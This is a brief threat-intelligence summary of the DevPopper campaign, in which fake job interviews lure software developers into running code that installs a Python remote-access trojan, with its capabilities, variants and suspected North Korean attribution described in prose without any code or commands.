PolySwarm summarizes DevPopper activity in which threat actors use fake job interviews to target software developers and deliver a Python-based RAT. The infection chain begins when developers are asked to download and run GitHub-hosted code, leading an NPM package to execute obfuscated JavaScript that uses Node.js and curl to retrieve a second-stage archive from C2. DevPopper collects system, host, and network data and supports remote access, file search and theft, command execution, clipboard logging, and keylogging. The excerpt says Securonix assessed the campaign as likely North Korean based on similar historical activity, while victims were observed in South Korea, North America, Europe, and the Middle East. Updated variants expand targeting across Linux, Windows, and macOS and add FTP, encrypted file upload, browser credential and cookie theft, stronger obfuscation, and directory traversal capabilities.